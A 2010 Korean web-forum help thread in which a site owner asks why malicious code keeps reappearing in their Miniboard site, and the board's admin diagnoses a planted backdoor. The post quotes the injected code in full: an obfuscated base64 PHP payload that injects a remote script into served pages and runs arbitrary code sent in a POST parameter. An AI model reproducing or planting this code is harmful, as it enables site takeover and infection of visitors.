메인 메뉴
미니아이
프로그램
서비스
  • 준비중
미니아이 하위메뉴
자유게시판

현재접속자 (0) 전체보기 (5153) 잡담 (3517) 질문/답변 (1322) 강좌/팁 (210) 뉴스/정보 (5) 그림일기 (99)
RSS FEED Total 5153 visited today 16/333 , yesterday 83/1696
노아선
추천수 0   조회수 1163   글쓴시간 2010/04/06 09:55:58
카테고리 질문/답변
오늘의기분 행복
제목 악성코드가 삽입 됩니다ㅜㅜ
미니보드 오리지널 버젼을 사용중인데요.
스팸코멘트등은 제가 어떻게 막았는데요.

어느 날 부터 사이트 소스 상단에
<?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygndGVvYXEnKSl7ZnVuY3Rpb24gdGVvYXEoJHMpe2lmKHByZWdfbWF0Y2hfYWxsKCcjPHNjcmlwdCguKj8pPC9zY3JpcHQ+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXWFzJHYpaWYoY291bnQoZXhwbG9kZSgiXG4iLCR2KSk+NSl7JGU9cHJlZ19tYXRjaCgnI1tcJyJdW15cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8fHByZWdfbWF0Y2goJyNbXChcW10oXHMqXGQrLCl7MjAsfSMnLCR2KTtpZigocHJlZ19tYXRjaCgnI1xiZXZhbFxiIycsJHYpJiYoJGV8fHN0cnBvcygkdiwnZnJvbUNoYXJDb2RlJykpKXx8KCRlJiZzdHJwb3MoJHYsJ2RvY3VtZW50LndyaXRlJykpKSRzPXN0cl9yZXBsYWNlKCR2LCcnLCRzKTt9aWYocHJlZ19tYXRjaF9hbGwoJyM8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/Ly8oW14+XSo/KT4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdYXMkdilpZihwcmVnX21hdGNoKCcjW1wuIF13aWR0aFxzKj1ccypbXCciXT8wKlswLTldW1wnIj4gXXxkaXNwbGF5XHMqOlxzKm5vbmUjaScsJHYpJiYhc3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZSgkdiwnIycpLicuKj88L2lmcmFtZT4jaXMnLCcnLCRzKTskcz1zdHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQSE5qY21sd2RDQnpjbU05YUhSMGNEb3ZMMk41WW1WeVkyaGhiM011WlhVdmFXMWhaMlZ6TDIxbGJXSmxjbk11Y0dod0lENDhMM05qY21sd2REND0nKSwnJywkcyk7aWYoc3RyaXN0cigkcywnPGJvZHknKSkkcz1wcmVnX3JlcGxhY2UoJyMoXHMqPGJvZHkpI21pJywkYS4nXDEnLCRzLDEpO2Vsc2VpZihzdHJwb3MoJHMsJzxhJykpJHM9JGEuJHM7cmV0dXJuJHM7fWZ1bmN0aW9uIHRlb2FxMigkYSwkYiwkYywkZCl7Z2xvYmFsJHRlb2FxMTskcz1hcnJheSgpO2lmKGZ1bmN0aW9uX2V4aXN0cygkdGVvYXExKSljYWxsX3VzZXJfZnVuYygkdGVvYXExLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpYXMkdilpZigoJGE9JHZbJ25hbWUnXSk9PSd0ZW9hcScpcmV0dXJuO2Vsc2VpZigkYT09J29iX2d6aGFuZGxlcicpYnJlYWs7ZWxzZSRzW109YXJyYXkoJGE9PSdkZWZhdWx0IG91dHB1dCBoYW5kbGVyJz9mYWxzZTokYSk7Zm9yKCRpPWNvdW50KCRzKS0xOyRpPj0wOyRpLS0peyRzWyRpXVsxXT1vYl9nZXRfY29udGVudHMoKTtvYl9lbmRfY2xlYW4oKTt9b2Jfc3RhcnQoJ3Rlb2FxJyk7Zm9yKCRpPTA7JGk8Y291bnQoJHMpOyRpKyspe29iX3N0YXJ0KCRzWyRpXVswXSk7ZWNobyAkc1skaV1bMV07fX19JHRlb2FxbD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcigndGVvYXEyJykpIT0ndGVvYXEyJyk/JGE6MDtldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUWydlJ10pKTs=')); ?>

이런 문구가 삽입되면서 사이트가 느려져, 삭제 하면 어느 날 다시 생기고 해서
미니보드 취약점 때문에 그런것 같은데 막을 방법이 없을까요?
댓글이 2개 / 트랙백이 0개 있습니다 이 글의 트랙백 주소받기
1  mini
안녕하세요 :)

제 생각엔 백도어가 심어져있는 듯 합니다.
원래 있던 파일이 변경되었다는 것은 이미 그 서버의 관리자 권한을 획득했다는 것과 같습니다.
미니보드를 통해서는 원래 있던 파일을 수정할 수 없습니다.
(예전에 있던 보안 위험을 통해 부가적인 방법으로 백도어를 심었을 확률은 존재합니다만;)

따라서 현재 서비스의 백도어를 살펴주시고, 보안을 강화하고 관리자 비밀번호 변경 등을
수행해 주셔야 할 듯 합니다.
2010/04/06 10:54:48
2  노아선
우잉 빠른 답변 감사합니다^^
2010/04/06 12:59:12
댓글 쓰기
이름
비밀번호
메일
글 기능




기능에 마우스를 올리시면 각 기능들의 설명을 보여줍니다.
태그
트랙백쓰기
저작권
- 글 내용을 분류할 주제어(태그)를 입력합니다.
- 여러개를 입력할 때에는 구분을 콤마(,)로 해주세요.
- 자동뽑기 버튼을 클릭하면 본문 중에서 임의로 주제어를 뽑아 보여줍니다. 이 중 원하시는 주제어를 클릭하시면 입력됩니다.


번호 제목 글쓴이 조회수 작성일
공지 miniboard original v4 0523 보안패치 (2) mini 7221 05/14 01:52
공지 미니아이, 미니보드 앞으로의 방향에 대해 알려드립니다. (11) mini 11249 03/29 15:19
5153 HTML 500 Internal Server Error Jay 290 08/09 11:46
5152 설치 에러입니다! 도와주세요 -------- 김재원님 715 06/21 22:27
5151 미니보드 original 에 관하여... (1) 호돌 3 06/02 20:04
5150 안녕하세요~ (4) euno 6 05/31 05:39
5149 최근게시물사용법을 다 까먹어버렸네요; 메뉴얼고 없고; (1) 로이드 1166 04/18 17:47
5148 추가필드내용이 저장이 안되는거 같습니다. (1) 로이드 1012 04/15 01:35
5147 회원가입 폼에서 우편번호 (1) 강석철 836 04/11 22:11
5146 악성코드가 삽입 됩니다ㅜㅜ (2) 노아선 1163 04/06 09:55
5145 feed.php 는 어디에 있나요? (4) hika 1254 03/24 17:26
5144 안녕하세요^^ 질문하나 드릴께요~ (1) 박재영 1314 03/11 15:58
5142 setting.ini.php 파일이 존재하지 않습니다! 라는 오류납니다. (2) jmh 1505 02/21 01:01
5141 swing_LB_gallery 스윙님 스킨 질문입니다. (1) barare 1358 02/19 18:59
5140 안녕하세요 (1) 이승준 7 02/19 03:42
5139 안녕하세요 (2) 로이드 2945 02/11 01:27
5138 갑자기 에러가 뜹니다~ (1) LEO NAM 1514 02/05 09:51
1
2
3
4
5
6
7
8
9
10
11
LAST
the M , skin mini